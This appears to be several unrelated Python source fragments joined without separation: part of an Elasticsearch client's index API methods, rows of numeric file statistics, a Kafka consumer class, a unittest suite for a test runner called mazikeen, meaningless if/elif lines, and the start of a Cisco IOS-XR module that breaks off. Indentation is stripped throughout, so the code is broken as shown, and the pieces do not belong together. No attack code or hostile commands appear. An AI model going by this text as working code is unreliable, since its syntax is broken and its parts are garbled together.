master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
template: Optional[Any] = None,
) -> ObjectApiResponse[Any]:
"""
Simulate resolving the given template name or body
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-templates.html>`_
:param name: Name of the index template to simulate. To test a template configuration
before you add it to the cluster, omit this parameter and specify the template
configuration in the request body.
:param create: If true, the template passed in the body is only used if no existing
templates match the same index patterns. If false, the simulation uses the
template with the highest priority. Note that the template is not permanently
added or updated in either case; it is only used for the simulation.
:param master_timeout: Period to wait for a connection to the master node. If
no response is received before the timeout expires, the request fails and
returns an error.
:param template:
"""
if name not in SKIP_IN_PATH:
__path = f"/_index_template/_simulate/{_quote(name)}"
else:
__path = "/_index_template/_simulate"
__query: Dict[str, Any] = {}
if create is not None:
__query["create"] = create
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
__body = template
if not __body:
__body = None
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
if __body is not None:
__headers["content-type"] = "application/json"
return self._perform_request("POST", __target, headers=__headers, body=__body) # type: ignore[no-any-return,return-value]
@_rewrite_parameters(
body_fields=True,
)
def split(
self,
*,
index: Any,
target: Any,
aliases: Optional[Dict[Any, Any]] = None,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
settings: Optional[Dict[str, Any]] = None,
timeout: Optional[Any] = None,
wait_for_active_shards: Optional[Any] = None,
) -> ObjectApiResponse[Any]:
"""
Allows you to split an existing index into a new index with more primary shards.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-split-index.html>`_
:param index: The name of the source index to split
:param target: The name of the target index to split into
:param aliases:
:param master_timeout: Specify timeout for connection to master
:param settings:
:param timeout: Explicit operation timeout
:param wait_for_active_shards: Set the number of active shards to wait for on
the shrunken index before the operation returns.
"""
if index in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'index'")
if target in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'target'")
__path = f"/{_quote(index)}/_split/{_quote(target)}"
__body: Dict[str, Any] = {}
__query: Dict[str, Any] = {}
if aliases is not None:
__body["aliases"] = aliases
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if settings is not None:
__body["settings"] = settings
if timeout is not None:
__query["timeout"] = timeout
if wait_for_active_shards is not None:
__query["wait_for_active_shards"] = wait_for_active_shards
if not __body:
__body = None # type: ignore[assignment]
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
if __body is not None:
__headers["content-type"] = "application/json"
return self._perform_request("PUT", __target, headers=__headers, body=__body) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def stats(
self,
*,
index: Optional[Any] = None,
metric: Optional[Any] = None,
completion_fields: Optional[Any] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
fielddata_fields: Optional[Any] = None,
fields: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
forbid_closed_indices: Optional[bool] = None,
groups: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
include_segment_file_sizes: Optional[bool] = None,
include_unloaded_segments: Optional[bool] = None,
level: Optional[Any] = None,
pretty: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Provides statistics on operations happening in an index.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-stats.html>`_
:param index: A comma-separated list of index names; use `_all` or empty string
to perform the operation on all indices
:param metric: Limit the information returned the specific metrics.
:param completion_fields: A comma-separated list of fields for the `completion`
index metric (supports wildcards)
:param expand_wildcards: Whether to expand wildcard expression to concrete indices
that are open, closed or both.
:param fielddata_fields: A comma-separated list of fields for the `fielddata`
index metric (supports wildcards)
:param fields: A comma-separated list of fields for `fielddata` and `completion`
index metric (supports wildcards)
:param forbid_closed_indices: If set to false stats will also collected from
closed indices if explicitly specified or if expand_wildcards expands to
closed indices
:param groups: A comma-separated list of search groups for `search` index metric
:param include_segment_file_sizes: Whether to report the aggregated disk usage
of each one of the Lucene index files (only applies if segment stats are
requested)
:param include_unloaded_segments: If set to true segment stats will include stats
for segments that are not currently loaded into memory
:param level: Return stats aggregated at cluster, index or shard level
"""
if index not in SKIP_IN_PATH and metric not in SKIP_IN_PATH:
__path = f"/{_quote(index)}/_stats/{_quote(metric)}"
elif index not in SKIP_IN_PATH:
__path = f"/{_quote(index)}/_stats"
elif metric not in SKIP_IN_PATH:
__path = f"/_stats/{_quote(metric)}"
else:
__path = "/_stats"
__query: Dict[str, Any] = {}
if completion_fields is not None:
__query["completion_fields"] = completion_fields
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if fielddata_fields is not None:
__query["fielddata_fields"] = fielddata_fields
if fields is not None:
__query["fields"] = fields
if filter_path is not None:
__query["filter_path"] = filter_path
if forbid_closed_indices is not None:
__query["forbid_closed_indices"] = forbid_closed_indices
if groups is not None:
__query["groups"] = groups
if human is not None:
__query["human"] = human
if include_segment_file_sizes is not None:
__query["include_segment_file_sizes"] = include_segment_file_sizes
if include_unloaded_segments is not None:
__query["include_unloaded_segments"] = include_unloaded_segments
if level is not None:
__query["level"] = level
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("GET", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def unfreeze(
self,
*,
index: Any,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
timeout: Optional[Any] = None,
wait_for_active_shards: Optional[str] = None,
) -> ObjectApiResponse[Any]:
"""
Unfreezes an index. When a frozen index is unfrozen, the index goes through the
normal recovery process and becomes writeable again.
`<https://www.elastic.co/guide/en/elasticsearch/reference/current/unfreeze-index-api.html>`_
:param index: The name of the index to unfreeze
:param allow_no_indices: Whether to ignore if a wildcard indices expression resolves
into no concrete indices. (This includes `_all` string or when no indices
have been specified)
:param expand_wildcards: Whether to expand wildcard expression to concrete indices
that are open, closed or both.
:param ignore_unavailable: Whether specified concrete indices should be ignored
when unavailable (missing or closed)
:param master_timeout: Specify timeout for connection to master
:param timeout: Explicit operation timeout
:param wait_for_active_shards: Sets the number of active shards to wait for before
the operation returns.
"""
if index in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'index'")
__path = f"/{_quote(index)}/_unfreeze"
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if timeout is not None:
__query["timeout"] = timeout
if wait_for_active_shards is not None:
__query["wait_for_active_shards"] = wait_for_active_shards
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("POST", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters(
body_fields=True,
)
def update_aliases(
self,
*,
actions: Optional[List[Any]] = None,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
timeout: Optional[Any] = None,
) -> ObjectApiResponse[Any]:
"""
Updates index aliases.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-aliases.html>`_
:param actions:
:param master_timeout: Specify timeout for connection to master
:param timeout: Request timeout
"""
__path = "/_aliases"
__body: Dict[str, Any] = {}
__query: Dict[str, Any] = {}
if actions is not None:
__body["actions"] = actions
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if timeout is not None:
__query["timeout"] = timeout
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json", "content-type": "application/json"}
return self._perform_request("POST", __target, headers=__headers, body=__body) # type: ignore[no-any-return,return-value]
@_rewrite_parameters(
body_fields=True,
)
def validate_query(
self,
*,
index: Optional[Any] = None,
all_shards: Optional[bool] = None,
allow_no_indices: Optional[bool] = None,
analyze_wildcard: Optional[bool] = None,
analyzer: Optional[str] = None,
default_operator: Optional[Any] = None,
df: Optional[str] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
explain: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
lenient: Optional[bool] = None,
pretty: Optional[bool] = None,
q: Optional[str] = None,
query: Optional[Any] = None,
rewrite: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Allows a user to validate a potentially expensive query without executing it.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/search-validate.html>`_
:param index: A comma-separated list of index names to restrict the operation;
use `_all` or empty string to perform the operation on all indices
:param all_shards: Execute validation on all shards instead of one random shard
per index
:param allow_no_indices: Whether to ignore if a wildcard indices expression resolves
into no concrete indices. (This includes `_all` string or when no indices
have been specified)
:param analyze_wildcard: Specify whether wildcard and prefix queries should be
analyzed (default: false)
:param analyzer: The analyzer to use for the query string
:param default_operator: The default operator for query string query (AND or
OR)
:param df: The field to use as default where no field prefix is given in the
query string
:param expand_wildcards: Whether to expand wildcard expression to concrete indices
that are open, closed or both.
:param explain: Return detailed information about the error
:param ignore_unavailable: Whether specified concrete indices should be ignored
when unavailable (missing or closed)
:param lenient: Specify whether format-based query failures (such as providing
text to a numeric field) should be ignored
:param q: Query in the Lucene query string syntax
:param query:
:param rewrite: Provide a more detailed explanation showing the actual Lucene
query that will be executed.
"""
if index not in SKIP_IN_PATH:
__path = f"/{_quote(index)}/_validate/query"
else:
__path = "/_validate/query"
__query: Dict[str, Any] = {}
__body: Dict[str, Any] = {}
if all_shards is not None:
__query["all_shards"] = all_shards
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if analyze_wildcard is not None:
__query["analyze_wildcard"] = analyze_wildcard
if analyzer is not None:
__query["analyzer"] = analyzer
if default_operator is not None:
__query["default_operator"] = default_operator
if df is not None:
__query["df"] = df
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if explain is not None:
__query["explain"] = explain
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if lenient is not None:
__query["lenient"] = lenient
if pretty is not None:
__query["pretty"] = pretty
if q is not None:
__query["q"] = q
if query is not None:
__body["query"] = query
if rewrite is not None:
__query["rewrite"] = rewrite
if not __body:
__body = None # type: ignore[assignment]
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
if __body is not None:
__headers["content-type"] = "application/json"
return self._perform_request("POST", __target, headers=__headers, body=__body) # type: ignore[no-any-return,return-value]
| 43.059184
| 130
| 0.617273
| 16,497
| 140,416
| 4.981209
| 0.0334
| 0.028537
| 0.050928
| 0.067125
| 0.854895
| 0.836593
| 0.828038
| 0.822622
| 0.815102
| 0.802361
| 0
| 0.000061
| 0.294126
| 140,416
| 3,260
| 131
| 43.072393
| 0.829019
| 0.286691
| 0
| 0.863404
| 0
| 0
| 0.126498
| 0.038551
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021702
| false
| 0.01617
| 0.001702
| 0
| 0.045532
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
92c14609e5373991c42ac3ab97117f4c4b347370
| 3,219
|
py
|
Python
|
sakarya_stream_project/controller/consumerController/consumerController.py
|
muhammeedsari/twitter-api-middleman
|
8b3790979694af9ee9ec5a47c76d05e7e3690e96
|
[
"MIT"
] | null | null | null |
sakarya_stream_project/controller/consumerController/consumerController.py
|
muhammeedsari/twitter-api-middleman
|
8b3790979694af9ee9ec5a47c76d05e7e3690e96
|
[
"MIT"
] | null | null | null |
sakarya_stream_project/controller/consumerController/consumerController.py
|
muhammeedsari/twitter-api-middleman
|
8b3790979694af9ee9ec5a47c76d05e7e3690e96
|
[
"MIT"
] | null | null | null |
from core.confluentKafka.kafka import Kafka
import simplejson as json
class ConsumerController:
def consume_tweets(self):
kafka = Kafka()
customer = kafka.create_consumer(topic="sentiment_topic", group_id="test")
while True:
try:
msg = customer.poll()
if msg is None:
continue
if msg.error():
print("Consumer customer error: {}".format(msg.error()))
continue
json_data = json.loads(msg.value().decode("utf-8"))
print(json_data)
except Exception as err:
print(f"something went wrong {err}")
def consume_tweets_agg(self):
kafka = Kafka()
customer = kafka.create_consumer(topic="sentiment_agg_topic", group_id="test")
while True:
try:
msg = customer.poll()
if msg is None:
continue
if msg.error():
print("Consumer customer error: {}".format(msg.error()))
continue
json_data = json.loads(msg.value().decode("utf-8"))
print(json_data)
except Exception as err:
print(f"something went wrong {err}")
def consume_tweets_word_agg(self):
kafka = Kafka()
customer = kafka.create_consumer(topic="sentiment_word_agg_topic", group_id="test")
while True:
try:
msg = customer.poll()
if msg is None:
continue
if msg.error():
print("Consumer customer error: {}".format(msg.error()))
continue
json_data = json.loads(msg.value().decode("utf-8"))
print(json_data)
except Exception as err:
print(f"something went wrong {err}")
def consume_tweets_agg_groupby(self):
kafka = Kafka()
customer = kafka.create_consumer(topic="sentiment_agg_groupby_topic", group_id="test")
while True:
try:
msg = customer.poll()
if msg is None:
continue
if msg.error():
print("Consumer customer error: {}".format(msg.error()))
continue
json_data = json.loads(msg.value().decode("utf-8"))
print(json_data)
except Exception as err:
print(f"something went wrong {err}")
def consume_tweets_agg_word2(self):
kafka = Kafka()
customer = kafka.create_consumer(topic="sentiment_word_agg_topic2", group_id="test")
while True:
try:
msg = customer.poll()
if msg is None:
continue
if msg.error():
print("Consumer customer error: {}".format(msg.error()))
continue
json_data = json.loads(msg.value().decode("utf-8"))
print(json_data)
except Exception as err:
print(f"something went wrong {err}")
| 30.084112
| 94
| 0.501087
| 326
| 3,219
| 4.812883
| 0.159509
| 0.031867
| 0.050988
| 0.070108
| 0.918419
| 0.918419
| 0.918419
| 0.918419
| 0.918419
| 0.883365
| 0
| 0.003625
| 0.400124
| 3,219
| 107
| 95
| 30.084112
| 0.808907
| 0
| 0
| 0.833333
| 0
| 0
| 0.130435
| 0.023602
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064103
| false
| 0
| 0.025641
| 0
| 0.102564
| 0.192308
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
13288b52d8d7b36e975cc608d05fc93a2bcd3368
| 10,902
|
py
|
Python
|
tests/Blackbox_test.py
|
hanniballar/mazikeen
|
68693a96c69376f18c21576a610470a543a89316
|
[
"MIT"
] | null | null | null |
tests/Blackbox_test.py
|
hanniballar/mazikeen
|
68693a96c69376f18c21576a610470a543a89316
|
[
"MIT"
] | 3
|
2021-04-05T17:14:21.000Z
|
2021-04-06T21:49:41.000Z
|
tests/Blackbox_test.py
|
hanniballar/mazikeen
|
68693a96c69376f18c21576a610470a543a89316
|
[
"MIT"
] | null | null | null |
import unittest
import subprocess
import os
import re
import platform
from mazikeen.Utils import diff, rmtree, diffStrategy
from xmldiff import main
from distutils.dir_util import copy_tree
class Blackbox(unittest.TestCase):
def test_simple(self):
testDir = "TestFiles/Blackbox_test/simple/"
outDir = testDir + "TestOutput"
rmtree(outDir)
os.makedirs(outDir)
with open(outDir + "/mazikenout.txt", "w") as of:
subprocess.run(["mazikeen"], stdout=of, stderr=of, cwd = testDir)
self.assertTrue(diff(testDir + "TestOutput/mazikenout.txt", testDir + "TestExpected/mazikenout.txt", ignore = ["process time: .*"]))
def test_cmdArg_ScriptName(self):
testDir = "TestFiles/Blackbox_test/cmdArg_ScriptName/"
outDir = testDir + "TestOutput"
rmtree(outDir)
os.makedirs(outDir)
with open(outDir + "/mazikenout.txt", "w") as of:
subprocess.run(["mazikeen", "--scriptName", "dummyScriptName.yaml"], stdout=of, stderr=of, cwd = testDir)
self.assertTrue(diff(testDir + "TestOutput/mazikenout.txt", testDir + "TestExpected/mazikenout.txt", ignore = ["process time: .*"]))
def test_inputFileNoutputFile(self):
testDir = "TestFiles/Blackbox_test/inputFileNoutputFile/"
outDir = testDir + "TestOutput"
rmtree(outDir)
os.makedirs(outDir)
with open(outDir + "/mazikenout.txt", "w") as of:
subprocess.run(["mazikeen"], stdout=of, stderr=of, cwd = testDir)
self.assertTrue(diff(testDir + "TestOutput/mazikenout.txt", testDir + "TestExpected/mazikenout.txt", ignore = ["process time: .*"]))
def test_blockinBlock(self):
testDir = "TestFiles/Blackbox_test/blockinBlock/"
outDir = testDir + "TestOutput"
rmtree(outDir)
os.makedirs(outDir)
with open(outDir + "/mazikenout.txt", "w") as of:
subprocess.run(["mazikeen"], stdout=of, stderr=of, cwd = testDir)
self.assertTrue(diff(testDir + "TestOutput/mazikenout.txt", testDir + "TestExpected/mazikenout.txt", ignore = ["process time: .*"]))
def test_testsuitsNtestcases_simple(self):
testDir = "TestFiles/Blackbox_test/testsuitsNtestcases/"
outDir = testDir + "TestOutput/simple/"
rmtree(outDir)
os.makedirs(outDir)
with open(outDir + "/mazikenout.txt", "w") as of:
subprocess.run(["mazikeen"], stdout=of, stderr=of, cwd = testDir)
self.assertTrue(diff(testDir + "TestOutput/simple/mazikenout.txt", testDir + "TestExpected/simple/mazikenout.txt", ignore = ["process time: .*"]))
def test_testsuitsNtestcases_report(self):
testDir = "TestFiles/Blackbox_test/testsuitsNtestcases/"
outDir = testDir + "TestOutput/report"
rmtree(outDir)
os.makedirs(outDir)
with open(outDir + "/mazikenout.txt", "w") as of:
subprocess.run(["mazikeen", "-r", "TestOutput/report/report.xml"], stdout=of, stderr=of, cwd = testDir)
with open(outDir + "/report.xml", "r") as ifile:
with open(outDir + "/report_diff.xml", "w") as ofile:
for line in ifile:
line = re.sub(r"time=\".+?\"", "time=\"\"", line)
line = re.sub(r"\\", "/", line)
ofile.write(line)
self.assertEqual(main.diff_files(testDir + "TestOutput/report/report_diff.xml", testDir + "TestExpected/report/report_diff.xml"), [])
def test_testsuitsNtestcases_wait_parallel(self):
testDir = "TestFiles/Blackbox_test/testsuitsNtestcases_wait/"
outDir = testDir + "TestOutput/parallel/"
rmtree(outDir)
os.makedirs(outDir)
with open(outDir + "/mazikenout.txt", "w") as of:
subprocess.run(["mazikeen", "-r", "TestOutput/parallel/report.xml", "-j", "2"], stdout=of, stderr=of, cwd = testDir)
with open(outDir + "/report.xml", "r") as ifile:
with open(outDir + "/report_diff.xml", "w") as ofile:
for line in ifile:
line = re.sub(r"time=\".+?\"", "time=\"\"", line)
line = re.sub(r"\\", "/", line)
ofile.write(line)
self.assertEqual(main.diff_files(outDir + "/report_diff.xml", outDir + "/report_diff.xml"), [])
self.assertTrue(diff(testDir + "TestOutput/parallel/mazikenout.txt", testDir + "TestExpected/parallel/mazikenout.txt", ignore = ["process time: .*"]))
def test_testsuitsNtestcases_waitNfail_parallel(self):
testDir = "TestFiles/Blackbox_test/testsuitsNtestcases_waitNfail/"
outDir = testDir + "TestOutput/parallel/"
rmtree(outDir)
os.makedirs(outDir)
with open(outDir + "/mazikenout.txt", "w") as of:
subprocess.run(["mazikeen", "-r", "TestOutput/parallel/report.xml", "-j", "2"], stdout=of, stderr=of, cwd = testDir)
with open(outDir + "/report.xml", "r") as ifile:
with open(outDir + "/report_diff.xml", "w") as ofile:
for line in ifile:
line = re.sub(r"time=\".+?\"", "time=\"\"", line)
line = re.sub(r"\\", "/", line)
ofile.write(line)
self.assertEqual(main.diff_files(outDir + "/report_diff.xml", outDir + "/report_diff.xml"), [])
self.assertTrue(diff(testDir + "TestOutput/parallel/mazikenout.txt", testDir + "TestExpected/parallel/mazikenout.txt", ignore = ["process time: .*"]))
def test_testsuitsNtestcases_waitNfail_serial(self):
testDir = "TestFiles/Blackbox_test/testsuitsNtestcases_waitNfail/"
outDir = testDir + "TestOutput/serial/"
rmtree(outDir)
os.makedirs(outDir)
with open(outDir + "/mazikenout.txt", "w") as of:
subprocess.run(["mazikeen", "-r", "TestOutput/serial/report.xml", "-j", "2"], stdout=of, stderr=of, cwd = testDir)
with open(outDir + "/report.xml", "r") as ifile:
with open(outDir + "/report_diff.xml", "w") as ofile:
for line in ifile:
line = re.sub(r"time=\".+?\"", "time=\"\"", line)
line = re.sub(r"\\", "/", line)
ofile.write(line)
self.assertEqual(main.diff_files(outDir + "/report_diff.xml", outDir + "/report_diff.xml"), [])
self.assertTrue(diff(testDir + "TestOutput/serial/mazikenout.txt", testDir + "TestExpected/serial/mazikenout.txt", ignore = ["process time: .*"]))
def test_testsuitsNtestcases_waitNfail_failFast(self):
testDir = "TestFiles/Blackbox_test/testsuitsNtestcases_waitNfail/"
outDir = testDir + "TestOutput/failFast/"
rmtree(outDir)
os.makedirs(outDir)
with open(outDir + "/mazikenout.txt", "w") as of:
subprocess.run(["mazikeen", "-r", "TestOutput/failFast/report.xml", "-j", "2", "--failfast"], stdout=of, stderr=of, cwd = testDir)
with open(outDir + "/report.xml", "r") as ifile:
with open(outDir + "/report_diff.xml", "w") as ofile:
for line in ifile:
line = re.sub(r"time=\".+?\"", "time=\"\"", line)
line = re.sub(r"\\", "/", line)
ofile.write(line)
self.assertEqual(main.diff_files(outDir + "/report_diff.xml", outDir + "/report_diff.xml"), [])
self.assertTrue(diff(testDir + "TestOutput/failFast/mazikenout.txt", testDir + "TestExpected/failFast/mazikenout.txt", ignore = ["process time: .*"]))
def test_upgradeScriptData1_0_0(self):
testDir = "TestFiles/Blackbox_test/upgradeScriptData1.0.0/"
outDir = testDir + "TestOutput/"
rmtree(outDir)
os.makedirs(outDir)
copy_tree(testDir+"TestInput", outDir)
with open(outDir + "/mazikenout.txt", "w") as of:
subprocess.run(["mazikeen", "--upgradeScriptFile"], stdout=of, stderr=of, cwd = outDir)
self.assertTrue(diff(testDir + "TestOutput/mazikenout.txt", testDir + "TestExpected/mazikenout.txt", ignore = ["process time: .*"]))
self.assertTrue(diff(testDir + "TestOutput/script.yaml", testDir + "TestExpected/script.yaml"))
def test_upgradeScriptData1_1_0(self):
testDir = "TestFiles/Blackbox_test/upgradeScriptData1.1.0/"
outDir = testDir + "TestOutput/"
rmtree(outDir)
os.makedirs(outDir)
copy_tree(testDir+"TestInput", outDir)
with open(outDir + "/mazikenout.txt", "w") as of:
subprocess.run(["mazikeen", "--upgradeScriptFile"], stdout=of, stderr=of, cwd = outDir)
self.assertTrue(diff(testDir + "TestOutput/mazikenout.txt", testDir + "TestExpected/mazikenout.txt", ignore = ["process time: .*"]))
self.assertTrue(diff(testDir + "TestOutput/script.yaml", testDir + "TestExpected/script.yaml"))
def test_emptyTest(self):
testDir = "TestFiles/Blackbox_test/emptyTest/"
outDir = testDir + "TestOutput/"
rmtree(outDir)
os.makedirs(outDir)
with open(outDir + "/mazikenout.txt", "w") as of:
subprocess.run(["mazikeen"], stdout=of, stderr=of, cwd = testDir)
self.assertTrue(diff(testDir + "TestOutput/mazikenout.txt", testDir + "TestExpected/mazikenout.txt", ignore = ["process time: .*"]))
def test_shellWindows(self):
if (platform.system() == "Windows"):
testDir = "TestFiles/Blackbox_test/shellWin/"
outDir = testDir + "TestOutput"
rmtree(outDir)
os.makedirs(outDir)
with open(outDir + "/mazikenout.txt", "w") as of:
subprocess.run(["mazikeen"], stdout=of, stderr=of, cwd = testDir)
self.assertTrue(diff(testDir + "TestOutput/mazikenout.txt", testDir + "TestExpected/mazikenout.txt", ignore = ["process time: .*"]))
def test_shellLinux(self):
if (platform.system() == "Linux"):
testDir = "TestFiles/Blackbox_test/shellLinux/"
outDir = testDir + "TestOutput"
rmtree(outDir)
os.makedirs(outDir)
with open(outDir + "/mazikenout.txt", "w") as of:
subprocess.run(["mazikeen"], stdout=of, stderr=of, cwd = testDir)
self.assertTrue(diff(testDir + "TestOutput/mazikenout.txt", testDir + "TestExpected/mazikenout.txt", ignore = ["process time: .*"]))
def test_shellPython(self):
testDir = "TestFiles/Blackbox_test/shellPython/"
outDir = testDir + "TestOutput"
rmtree(outDir)
os.makedirs(outDir)
with open(outDir + "/mazikenout.txt", "w") as of:
subprocess.run(["mazikeen"], stdout=of, stderr=of, cwd = testDir)
self.assertTrue(diff(testDir + "TestOutput/mazikenout.txt", testDir + "TestExpected/mazikenout.txt", ignore = ["process time: .*"]))
if __name__ == '__main__':
unittest.main()
| 53.180488
| 158
| 0.609888
| 1,159
| 10,902
| 5.664366
| 0.07679
| 0.091089
| 0.055446
| 0.064737
| 0.860625
| 0.836253
| 0.829551
| 0.798172
| 0.786748
| 0.754303
| 0
| 0.001924
| 0.237021
| 10,902
| 204
| 159
| 53.441176
| 0.787329
| 0
| 0
| 0.709497
| 0
| 0
| 0.291873
| 0.170061
| 0
| 0
| 0
| 0
| 0.122905
| 1
| 0.089385
| false
| 0
| 0.044693
| 0
| 0.139665
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
13523ba9882c401ba6a35ea1823238e4454e5bac
| 40
|
py
|
Python
|
ast/testdata/if_elif.py
|
MaxTurchin/pycopy-lib
|
d7a69fc2a28031e2ca475c29239f715c1809d8cc
|
[
"PSF-2.0"
] | 126
|
2019-07-19T14:42:41.000Z
|
2022-03-21T22:22:19.000Z
|
ast/testdata/if_elif.py
|
MaxTurchin/pycopy-lib
|
d7a69fc2a28031e2ca475c29239f715c1809d8cc
|
[
"PSF-2.0"
] | 38
|
2019-08-28T01:46:31.000Z
|
2022-03-17T05:46:51.000Z
|
ast/testdata/if_elif.py
|
MaxTurchin/pycopy-lib
|
d7a69fc2a28031e2ca475c29239f715c1809d8cc
|
[
"PSF-2.0"
] | 55
|
2019-08-02T09:32:33.000Z
|
2021-12-22T11:25:51.000Z
|
if 1:
2
elif 3:
4
elif 5:
6
| 5.714286
| 7
| 0.4
| 9
| 40
| 1.777778
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.315789
| 0.525
| 40
| 6
| 8
| 6.666667
| 0.526316
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
13b8e6e63e1d8c6fcb24f19e81cab2834eb8ed0d
| 290,887
|
py
|
Python
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_manageability_object_tracking_oper.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 177
|
2016-03-15T17:03:51.000Z
|
2022-03-18T16:48:44.000Z
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_manageability_object_tracking_oper.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 18
|
2016-03-30T10:45:22.000Z
|
2020-07-14T16:28:13.000Z
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_manageability_object_tracking_oper.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 85
|
2016-03-16T20:38:57.000Z
|
2022-02-22T04:26:02.000Z
|
""" Cisco_IOS_XR_manageability_object_tracking_oper
This module contains a collection of YANG definitions
for Cisco IOS\-XR manageability\-object\-tracking package operational data.
This module contains definitions
for the following management objects\:
object\-tracking\: Object Tracking operational data
Copyright (c) 2013\-2018 by Cisco Systems, Inc.
All rights reserved.
"""
import sys
